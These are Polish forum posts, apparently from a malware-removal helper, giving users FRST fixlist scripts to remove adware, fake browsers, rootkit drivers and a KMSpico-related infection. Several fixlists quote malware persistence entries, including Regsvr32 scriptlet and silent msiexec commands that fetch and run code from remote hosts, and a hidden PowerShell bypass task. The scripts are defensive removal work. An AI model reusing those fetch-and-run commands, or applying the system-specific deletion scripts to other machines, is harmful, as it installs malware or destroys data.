picasso

Po pierwsze, strona Google domyślnie działa już tylko w systemie https a nie http. To co jest tu nie w porządku to fakt, że wklepując te adresy bez prefiksu https nie zostajesz automatycznie przekierowany przez przeglądarkę na wariant z https tylko dostajesz błąd otwierania http (co jest spodziewane). Ten problem w teorii się rozwiązuje poprzez rekonfigurację niektórych preferencji Firefoxa, ale: Masz starą wersję przeglądarki: Mozilla Firefox 45.0.1 (x86 pl) (HKLM-x32\...\Mozilla Firefox 45.0.1 (x86 pl)) (Version: 45.0.1 - Mozilla) Najnowsza to Firefox 54. Zacznij od instalacji najnowszej wersji.

Jeśli na pewno te katalogi są puste, to dostarcz więcej danych do analizy. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: Folder: C:\Windows\PolicyDefinitions Zip: C:\Program Files (x86)\Google;C:\Users\user\AppData\Local\Google Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Przedstaw wynikowy fixlog.txt. Na Pulpicie powstał też plik data_czas.zip. Shostuj go gdzieś i podaj link do paczki.

Może to właśnie coś nie tak z tym plikiem w oryginalnej lokalizacji, stąd problem z rozruchem? Sprawdź czy da radę wykonać kopiowanie ręcznie: Restart komputera i wejdź do opcji RE. Nie uruchamiaj FRST, gdyż on montuje tymczasowo pliki rejestru i nastąpi konflikt w "użyciu". W Wierszu polecenia RE upewnij się za pomocą komendy notepad jakie jest mapowanie dysku z Windows. Następnie wklep poniższą komendę, pod X podstawiając stosowną literę: copy /y X:\Windows\System32\config\RegBack\SYSTEM X:\Windows\System32\config\SYSTEM

Wszystko zrobione. Kończymy: Zastosuj DelFix, a następnie wyczyść foldery Przywracania systemu: KLIK.

Wyniki z obu narzędzi zostaną usunięte hurtem przy udziale jednego skryptu FRST. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: DeleteKey: HKLM\SYSTEM\CurrentControlSet\Control\iSafeKrnlBoot DeleteKey: HKLM\SYSTEM\CurrentControlSet\Control\Power\User\PowerSchemes\e24b7131-d039-43cb-9e6f-ad4be601ec1f DeleteKey: HKLM\SYSTEM\CurrentControlSet\Control\Power\User\PowerSchemes\04262113-2a31-48e1-b4bb-3b42174bea0f DeleteKey: HKLM\SOFTWARE\WOW6432Node\Elex-tech DeleteKey: HKLM\SOFTWARE\WOW6432Node\ScreenShot DeleteKey: HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\11598763487076930564 DeleteKey: HKLM\SOFTWARE\WOW6432Node\Mozilla DeleteKey: HKCU\Software\1Q1F1S1C1P1E1C1F1N1C1T1H2UtF1E1I DeleteKey: HKCU\Software\csastats DeleteKey: HKCU\Software\dobreprogramy DeleteKey: HKCU\Software\ICSW1.23 DeleteKey: HKCU\Software\One System Care DeleteKey: HKCU\Software\PRODUCTSETUP DeleteKey: HKCU\SOFTWARE\Classes\https DeleteKey: HKCU\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\ac1f1114_0 DeleteKey: HKCU\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\b1b34855_0 DeleteKey: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\RecentApps\{BDC6D552-7F73-4130-B342-1DB676DE23E0} DeleteValue: HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store|C:\Program Files (x86)\Bagsarah\Application\chrome.exe DeleteValue: HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store|C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\Users\Barteczek\AppData\Roaming\Bagsarah RemoveDirectory: C:\Users\Barteczek\AppData\Roaming\Elex-tech RemoveDirectory: C:\Users\Barteczek\AppData\Roaming\SSMgre RemoveDirectory: C:\Windows\system32\log StartBatch: del /q C:\Windows\system32\drivers\iSafeKrnlBoot.sys del /q C:\Windows\system32\drivers\iSafeNetFilter.sys EndBatch: Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Tym razem nie będzie restartu. Przedstaw wynikowy fixlog.txt. I proszę potwierdź, że w Chrome na liście wyszukiwarek adware już nie figuruje.

Spróbuj użyć inną kopię zapasową, czyli RegBack: 1. Przygotuj w Notatniku plik fixlist.txt o zawartości: LastRegBack: 2017-06-19 19:11 Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik umieść w tym samym folderze skąd uruchamiasz FRST. Uruchom FRST i klik w Napraw (Fix). Przedstaw wynikowy fixlog.txt. 2. Jeśli Windows się uruchomi, zrób cały zestaw raportów FRST. Niektóre elementy co dopiero usunięte za pomocą skryptu FRST oraz prawdopodobnie kupa śmieci z gałęzi SOFTWARE + SYSTEM usuniętych AdwCleaner wróci.

Niepożądane wątki o ComboFix wycięte. Ani to program do rozwiązywania takich spraw, ani nie jest obsługiwany na Windows 10 (i dobrze). Problem generują zadania Microsoft Office: Task: {08B2180A-FC07-4193-B8AA-97D703CAB39C} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerLogon => C:\Program Files\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2017-05-31] () Task: {38F6B75A-5444-403C-BDA6-817D1BE2A7B6} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerRegistration => C:\Program Files\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2017-05-31] () Więcej informacji tutaj: KLIK. Klawisz z flagą Windows + R > taskschd.msc > rozwiń gałąź Office i wyłącz oba zadania. PS. A w spoilerze wątek poboczny, tzn. usuwanie pustych wpisów głównie po aktualizacji z Windows 7 do Windows 10 oraz kilku pustych skrótów.

Tak sądziłam. Pozostaje więc użycie punktu Przywracania systemu sprzed usterki (starsze niż 19 czerwca). FRST wylicza następujące punkty: ==================== Punkty Przywracania systemu ========================= Data punktu przywracania: 2017-06-07 20:10 Data punktu przywracania: 2017-06-11 20:04 Data punktu przywracania: 2017-06-19 18:10 Data punktu przywracania: 2017-06-19 18:17 Data punktu przywracania: 2017-06-19 18:19 Data punktu przywracania: 2017-06-19 18:28 Data punktu przywracania: 2017-06-20 11:35 Zrób Przywracanie systemu z poziomu RE. Jeśli Windows ożyje, zrób logi FRST spod Windows.

Miszel03 prowadzi temat, więc wtrącam się tutaj pod innym kątem: Jeżeli z menu ustawiłeś Google jako domyślną, a wyszukiwarka adware nadal wraca i się ustawia samoczynnie jako domyślna, to być może jest tu jakaś niewidoczna na poziomie FRST blokada. Ostatnio to notowalne zachowanie w kilku tematach, pomimo że teoretycznie polityki Google nie zostały wykryte. Na wszelki wypadek proszę skopiuj na Pulpit następujące foldery (o ile są): C:\Windows\System32\GroupPolicy C:\Windows\System32\GroupPolicyUsers C:\Windows\SysWOW64\GroupPolicy C:\Windows\SysWOW64\GroupPolicyUsers Spakuj do ZIP, shostuj gdzieś i podaj link do paczki.

Cóż, z raportu FRST nic nie wynika w kontekście problemu. Owszem, widać nadal usługi adware (i to rzekomo usuwane przez AdwCleaner), ale podobne występują w innych tematach i nie był zgłaszany taki problem - zresztą etap z logo Windows to faza ładowania sterowników, a tu nie ma nic istotnego w logu.... Poza tym, niestety raport z RE jest ograniczony, tzn. nie listuje zadań Harmonogramu. Nie pozostaje nic innego jak usunąć to co widać, by się upewnić czy to (nie)jest przyczyną. 1. Przygotuj w Notatniku plik fixlist.txt o zawartości: S2 0085711497891849mcinstcleanup; C:\Users\Tomek\AppData\Local\Temp\008571~1.EXE [883024 2017-05-26] (McAfee, Inc.) <==== UWAGA S2 BIT; C:\ProgramData\BIT\BIT.dll [1812992 2017-05-31] (TODO: <公司名>) <==== UWAGA S2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [92672 2017-05-19] () <==== UWAGA S2 terana; C:\Users\Tomek\AppData\Local\terana\terana.dll [909312 2017-05-31] (IntertSect Alliance Pty Ltd) <==== UWAGA S2 WinSAPSvc; C:\Users\Tomek\AppData\Roaming\WinSAPSvc\WinSAP.dll [1886720 2017-05-31] () <==== UWAGA S3 aswbdisk; Brak ImagePath S4 huawei_enumerator; system32\DRIVERS\ew_jubusenum.sys [X] S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X] S3 tsusbhub; system32\drivers\tsusbhub.sys [X] S3 VGPU; System32\drivers\rdvgkmd.sys [X] HKLM-x32\...\Run: [] => [X] IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe GroupPolicy-x32: Ograniczenia - Chrome <======= UWAGA DeleteKey: HKLM\SOFTWARE\WOW6432Node\Baglook DeleteKey: HKLM\SOFTWARE\WOW6432Node\Firefox C:\Program Files\Malwarebytes C:\Program Files\MK C:\Program Files (x86)\Baglook C:\Program Files (x86)\Firefox C:\Program Files (x86)\McAfee C:\Program Files (x86)\MIO C:\ProgramData\AVAST Software C:\ProgramData\BIT C:\ProgramData\MailUpdate C:\ProgramData\Malwarebytes C:\ProgramData\McAfee C:\Users\Tomek\AppData\Local\background_fault C:\Users\Tomek\AppData\Local\Baglook C:\Users\Tomek\AppData\Local\Firefox C:\Users\Tomek\AppData\Local\terana C:\Users\Tomek\AppData\Local\Temp C:\Users\Tomek\AppData\Roaming\Firefox C:\Users\Tomek\AppData\Roaming\MailUpdate C:\Users\Tomek\AppData\Roaming\Picexa Viewer C:\Users\Tomek\AppData\Roaming\Temp C:\Users\Tomek\AppData\Roaming\WinSAPSvc C:\Users\Tomek\AppData\Roaming\WinZipper C:\Windows\System32\log C:\Windows\System32\Tasks\Milimili Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik umieść w tym samym folderze skąd uruchamiasz FRST. Uruchom FRST i klik w Napraw (Fix). Przedstaw wynikowy fixlog.txt. 2. Sprawdź czy jest możliwe zalogowanie do Windows. Jeśli tak, zrób cały zestaw raportów FRST.

Nie widzę żadnych zmian. Usuń adresy adware ręcznie z Google Chrome: Ustawienia > karta Ustawienia > Po uruchomieniu > Otwórz konkretną stronę lub zestaw stron > usuń wszystkie adresy > przestaw na "Otwórz stronę nowej karty" I czy przekierowania nadal mają miejsce?

1. Nadal widzę przekierowania luckysearch123.com w Google Chrome. Ustawienia > karta Ustawienia > Po uruchomieniu > Otwórz konkretną stronę lub zestaw stron > usuń adres luckysearch123.com, przestaw na "Otwórz stronę nowej karty" Ustawienia > karta Ustawienia > Wygląd i kliknij w napis "Pokaż przycisk strony startowej" > przełącz na opcję "Niestandardową" i usuń adres luckysearch123.com, następnie przełącz z powrotem na "Nową kartę". I czy na pewno ta wyszukiwarka nie figuruje na liście wyboru szukajek? 2. Uruchom FRST, w polu Szukaj (Search) wklej co poniżej i klik w Szukaj w rejestrze (Search Registry). Przedstaw wynikowy SearchReg.txt. Bagsarah;Firefox 3. Uruchom AdwCleaner. Wybierz opcję Skanuj i dostarcz log wynikowy z folderu C:\AdwCleaner.

Fixlog pokazuje, że wszystko przetworzone, ale nowe skany FRST są niepoprawne: uszkodzony nieomal pusty plik FRST.txt + stary plik Addition.txt z wczoraj sprzed usuwania. Usunęłam te dwa załączniki. Zrób nowe skany FRST i doczep do posta powyżej. Pliku Fixlog rzecz jasna nie ruszaj.

Temat przenoszę do działu malware - w systemie grasuje infekcja (ostatnio ładowana przez wynalazki typu KMSpico), poza tym inne ślady modyfikacji adware (np. fałszywe przeglądarki). Operacje do przeprowadzenia: 1. Klawisz z flagą Windows + X > Programy i funkcje > odinstaluj lewy program YAC(Yet Another Cleaner!) oraz fałszywy WorldOfTanks. Nie pomyl programów, tylko pierwsze wejście jest poprawne od gry: World of Tanks (HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\...\{1EAC1D02-C6AC-4FA6-9A44-96258C37C812eu}_is1) (Version: - Wargaming.net) WorldofTanks (HKLM-x32\...\WorldofTanks) (Version: - ) 2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [116376 2017-05-24] () R2 OneDirveSrv; C:\ProgramData\Microsoft OneDrive\setup\SyncTool.dll [129024 2017-05-10] () [brak podpisu cyfrowego] S2 pgt_svc; C:\Program Files (x86)\ProxyGate\MainService.exe [2285664 2017-02-22] (Gold Click Ltd) S2 iSafeService; C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe [X] S3 iSafeKrnlBoot; C:\Windows\System32\DRIVERS\iSafeKrnlBoot.sys [55056 2016-05-23] (Elex do Brasil Participações Ltda) R1 iSafeNetFilter; C:\Windows\System32\DRIVERS\iSafeNetFilter.sys [52392 2016-05-19] (Elex do Brasil Participações Ltda) S1 iSafeKrnl; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [X] S1 iSafeKrnlKit; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [X] S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X] S1 iSafeKrnlR3; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [X] Task: {0D7F4DB9-573C-4080-AF4A-79B3D6AAB75D} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj8cRWwcNkMxMWYxMWQYNkE2FkM2MUF8MjVXFjw2N8I2Mq== scrobj.dll Task: {10A81261-90F5-46B2-9684-6D8778E04859} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj8cRWwcNkMxMWYxMWQYNkE2FkM2MUF8MjVXFjw2N8I2Mq== scrobj.dll Task: {D48645EB-CC21-43F7-8FDE-9A023E2D224A} - System32\Tasks\Windows_Antimalware_System_Host => C:\ProgramData\MicrosoftCorporation\Windows\SystemData\Isass.exe [2017-06-12] (® Microsoft Corporation. All rights reserved.) Task: {E39F1B69-B55E-4D0E-954C-D79A1A0D5386} - System32\Tasks\Windows_Antimalware_Host => powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoP -file C:\ProgramData\u3bO8YL0WR.ps1 Task: C:\Windows\Tasks\One System Care Task.job => C:\PROGRA~2\ONESYS~1\SystemConsole.exe Task: C:\Windows\Tasks\One System CarePeriod.job => HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\...\Run: [Local Security Authority Process] => C:\ProgramData\MicrosoftCorporation\Windows\SystemData\Isass.exe [245248 2017-06-12] (® Microsoft Corporation. All rights reserved.) HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\...\Run: [Local Security Authority Processor] => C:\ProgramData\MicrosoftCorporation\Windows\SystemData\Isass.exe [245248 2017-06-12] (® Microsoft Corporation. All rights reserved.) HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\...\Policies\system: [shell] explorer.exe,msiexec.exe /i hxxp://point.orangeiloveyou.com/?data=zDlkMj8cRWwcNkMxMWYxMWQYNkE2FkM2MUF8MjVXFjw2N8I2Mq== /q HKLM-x32\...\Run: [] => [X] IFEO\DisplaySwitch.exe: [Debugger] IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe IFEO\taskmgr.exe: [Debugger] HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\...\ChromeHTML: -> C:\Program Files (x86)\Bagsarah\Application\chrome.exe (Google Inc.) HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Bagsarah\Application\chrome.exe (Google Inc.) HKLM\...\StartupApproved\Run32: => "Start_BusinessEverywhere_{ad30a369-08e3-414c-9d2c-7f47dbe748da}" HKLM\...\StartupApproved\Run32: => "Start_SMSNotifier_{ad30a369-08e3-414c-9d2c-7f47dbe748da}" HKLM\...\StartupApproved\Run32: => "Start_Update_{ad30a369-08e3-414c-9d2c-7f47dbe748da}" HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\...\StartupApproved\Run: => "World of Tanks" HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\...\StartupApproved\Run: => "DAEMON Tools Lite Automount" DeleteKey: HKCU\Software\Bagsarah DeleteKey: HKCU\Software\Firefox DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\WOW6432Node\Bagsarah DeleteKey: HKLM\SOFTWARE\WOW6432Node\Firefox DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Program Files\KMSpico C:\Program Files (x86)\Bagsarah C:\Program Files (x86)\BiaoJi C:\Program Files (x86)\Elex-tech C:\Program Files (x86)\Firefox C:\Program Files (x86)\ProxyGate C:\ProgramData\u3bO8YL0WR.ps1 C:\ProgramData\5f5e51cb-5c01-0 C:\ProgramData\5f5e51cb-4bd3-1 C:\ProgramData\MicrosoftCorporation C:\ProgramData\Microsoft OneDrive\setup\SyncTool.dll C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinDirStat C:\Users\Barteczek\AppData\Local\Bagsarah C:\Users\Barteczek\AppData\Local\Firefox C:\Users\Barteczek\AppData\Local\minergate-cli C:\Users\Barteczek\AppData\Local\Mozilla C:\Users\Barteczek\AppData\LocalLow\Mozilla C:\Users\Barteczek\AppData\Roaming\BrowserModule C:\Users\Barteczek\AppData\Roaming\Firefox C:\Users\Barteczek\AppData\Roaming\Mozilla C:\Users\Barteczek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\Users\Barteczek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Isass.lnk C:\Users\Barteczek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WorldofTanks C:\Users\Barteczek\Downloads\torrentex0.1.4b.exe C:\Users\Public\Documents\chrome C:\Users\Public\Documents\report.dat C:\Users\Public\Documents\temp.dat C:\Windows\SysWOW64\00 C:\Windows\SysWOW64\11 C:\Windows\SysWOW64\1111 C:\Windows\SysWOW64\1111111 C:\Windows\SysWOW64\33 C:\Windows\SysWOW64\3333333 C:\Windows\SysWOW64\55 C:\Windows\SysWOW64\GZ CMD: netsh advfirewall reset EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zostały usunięte wszystkie skróty fałszywych przeglądarek. Odtwórz w wybranych miejscach skróty do prawdziwego Google Chrome. Uruchom przeglądarkę i wyczyść ją z adware: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj adware Tables. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Wyszukiwarka > z rozwijanego menu ustaw jako domyślną Google > klik w Zarządzaj wyszukiwarkami i skasuj z listy wszystkie inne pozycje. Ustaw też przeglądarkę jako domyślną 4. Zrób nowy log FRST z opcji Skanuj (Scan), bez Shortcut. Dołącz też plik fixlog.txt.

Wszystko pomyśnie usunięte. Na koniec zastosuj DelFix.

"Rootkit" wykryty przez GMER to sterowniki tymczasowe Windows Defender relatywne do aktualizacji bazy danych. Wyniki do zignorowania. Poprzednie zadania wykonane pomyślnie, ale rzeczywiście LanmaMaster wrócił w czasie między logami FRST a AdwCleaner. Poprawki: 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: R1 LanmaMaster; C:\WINDOWS\system32\drivers\lanmamaster.sys [2957416 2016-11-11] () [brak podpisu cyfrowego] C:\ProgramData\WinCacheData C:\Users\Public\Documents\XMUpdate C:\WINDOWS\system32\lanmamasterHelp.dll C:\WINDOWS\system32\drivers\lanmamaster.sys Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Wejdź w Tryb awaryjny Windows. Uruchom FRST i kliknij Napraw (Fix). Nastąpi restart, opuść tryb awaryjny. Powstanie kolejny fixlog.txt. 2. Zrób nowy log FRST z opcji Skanuj (Scan), bez Addition i Shortcut. Dołącz też plik fixlog.txt.

Miałeś tylko dostarczyć logi z AdwCleaner sprzed pojawienia się na forum (czyli z wczoraj lub wcześniej), a nie uruchamiać program przed i po naprawie FRST. Kolizja ze skryptem FRST i zaciemnianie wyników. Obecnie trzymaj się tylko operacji z FRST, gdy będę potrzebować odczyt z AdwCleaner, poproszę o niego. FRST nie był w stanie ubić sterownika UefGdstor (w ogóle nie wykrywany przez AdwCleaner). Natomiast LanmaMaster nie jest obecny w dostarczonym raporcie FRST, ale pokazuje go nowszy log z AdwCleaner (czyli sterownik mógł wrócić). Ja się jednak trzymam odczytu z FRST a nie AdwCleaner, najwyżej podam potem kolejną poprawkę. Kolejne podejście: 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: U2 mptpmdxm; C:\Windows\SysWow64\mptpmdxm.dll [460072 2017-06-14] () R2 UefGdstor; C:\WINDOWS\system32\drivers\UefGdstor.sys [192552 2016-11-11] () C:\ProgramData\Cache C:\WINDOWS\system32\drivers\UefGdstor.sys C:\WINDOWS\SysWOW64\mptpmdxm.dll Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Wejdź w Tryb awaryjny Windows *. Uruchom FRST i kliknij Napraw (Fix). Nastąpi restart, opuść tryb awaryjny. Powstanie kolejny fixlog.txt. * Tryb awaryjny Windows 10: przycisk Start > Ustawienia > Aktualizacja i zabezpieczenia > Odzyskiwanie > Uruchamianie zaawansowane > Uruchom teraz > system zrestartuje i pojawi się ekan z opcjami > Ustawienia zaawansowane > Ustawienia uruchamiania > Tryb awaryjny. 2. Zrób nowy log FRST z opcji Skanuj (Scan), bez Shortcut, oraz GMER. Dołącz też plik fixlog.txt.

To Tesla w wersji 2. Obecnie sporo dekoderów do tego wariantu: KLIK.

Na przyszłość, proszę trzymaj się zasad działu w kwestii konfiguracji logów FRST - sekcje Lista BCD i MD5 sterowników nie miały być zaznaczone, to detekcje pod archaiczne infekcje. Operacje przeprowadzone przez Ciebie nieznane. mystarting123 był tylko i wyłącznie w profilu Google Chrome, a nie w innej partii systemu. Widzę teraz, że coś zrobiłeś z profilem Chrome, bo preferencje adware nie są już w nim obecne. Poprzedni skrypt FRST prawie cały aktualny z wyjątkiem partii relatywnej do Google Chrome. Nowa wersja skryptu do uruchomienia: CloseProcesses: CreateRestorePoint: S3 SWDUMon; C:\Windows\system32\DRIVERS\SWDUMon.sys [25608 2017-06-16] (SlimWare Utilities, Inc.) S1 fburutqr; \??\C:\Windows\system32\drivers\fburutqr.sys [X] U0 msahci; system32\drivers\msahci.sys [X] U0 Partizan; system32\drivers\Partizan.sys [X] Task: {72040F41-1635-429B-8BDF-289B41800C08} - \Plejuphaniling -> Brak pliku Task: {7ED7A3CA-D46E-41B5-8FA6-6E5FAAB4D385} - \AVG EUpdate Task -> Brak pliku ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku HKU\S-1-5-21-2586129371-1797009435-415111422-1001\...\StartupApproved\StartupFolder: => "Wysyłanie do programu OneNote.lnk" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\86006570.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\86006570.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""="" HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch HKU\S-1-5-21-2586129371-1797009435-415111422-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome SearchScopes: HKU\S-1-5-21-2586129371-1797009435-415111422-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-2586129371-1797009435-415111422-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = StartMenuInternet: IEXPLORE.EXE - iexplore.exe DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Program Files (x86)\Mozilla Firefox C:\Users\Czesław\AppData\Local\Mozilla C:\Users\Czesław\AppData\Roaming\Mozilla C:\Users\Czesław\Downloads\FRST64.exe.r6z2jjp.partial C:\Windows\system32\DRIVERS\SWDUMon.sys CMD: netsh advfirewall reset EmptyTemp: Przedstaw wynikowy fixlog.txt. Nowe skany FRST nie są potrzebne.

Znów został zainstalowany Popcorn Time (program flagowany przez FRST). Do czytania: KLIK. Fork do deinstalacji.

Wszystko zostało usunięte i w raportach nie ma żadnych aktywnych elementów, z wyjątkiem nadal nieczystych preferencji Chrome. Czy na pewno wykonałeś te działania:

Do wykonania kolejne kroki: 1. Nadal widzę w Google Chrome ustawienia wstawione przez niepożądaną instalację Bing: CHR HomePage: Default -> msn.com/?pc=__PARAM__&ocid=__PARAM__DHP&osmkt=pl-pl CHR DefaultSearchURL: Default -> hxxp://www.bing.com/search?FORM=__PARAM__DF&PC=__PARAM__&q={searchTerms} CHR DefaultSearchKeyword: Default -> bing.com - Ustawienia > karta Ustawienia > Wygląd i kliknij w napis "Pokaż przycisk strony startowej" > przełącz na opcję "Niestandardową" i usuń adres msn.com, następnie przełącz z powrotem na "Nową kartę". - Ustawienia > karta Ustawienia > sekcja Wyszukiwarka > z rozwijanego menu ustaw jako domyślną Google > klik w Zarządzaj wyszukiwarkami i skasuj z listy wszystkie inne pozycje. 2. Zastosuj DelFix oraz wyczyść foldery Przywracania systemu: KLIK. 3. Kompletnie nieaktualny Windows, brak SP1, IE11 i potężnej ilości łat. Do wykonania instalacje aktualizacji rozpisane w przyklejonym: KLIK.

Zabrakło trzeciego raportu FRST Shortcut. Używałeś też ComboFix, ten program nie nadaje się do czyszczenia adware z przeglądarek. SWDUMon pochodzi od Slimdrivers (program wątpliwej reputacji, może być przemycany na komputer metodami "PUP"), obecnie program jest w stanie szczątkowym i ostał się tylko ten sterownik (nawet nie jest uruchomiony). Odinstalowałeś wprawdzie Google Chrome, ale nieskutecznie - nie zaznaczyłeś podczas deinstalacji opcji Usuń także dane przeglądarki i pozostał cały profil Chrome na dysku zainfekowany przez mystarting123 - po instalacji Chrome ten profil zostanie ponownie załadowany. Tu należało zamiast deinstalacji Chrome wykonać poprawne czyszczenie / reset przeglądarki via jej własne opcje. W związku z tym, że przeglądarka została odinstalowana, profil usunę, ale to oznacza utratę zapisanych w nim danych. W skrypcie przekopiuję podstawowe pliki Bookmarks z zakładkami + Login Data z zapamiętanymi hasłami, które wstawisz do nowego profilu po świeżej instalacji Chrome. Działania do przeprowadzenia: 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: StartBatch: netsh advfirewall reset md C:\Users\Czesław\Desktop\Chrome copy /y "C:\Users\Czesław\AppData\Local\Google\Chrome\User Data\Default\Bookmarks" C:\Users\Czesław\Desktop\Chrome copy /y "C:\Users\Czesław\AppData\Local\Google\Chrome\User Data\Default\Login Data" C:\Users\Czesław\Desktop\Chrome 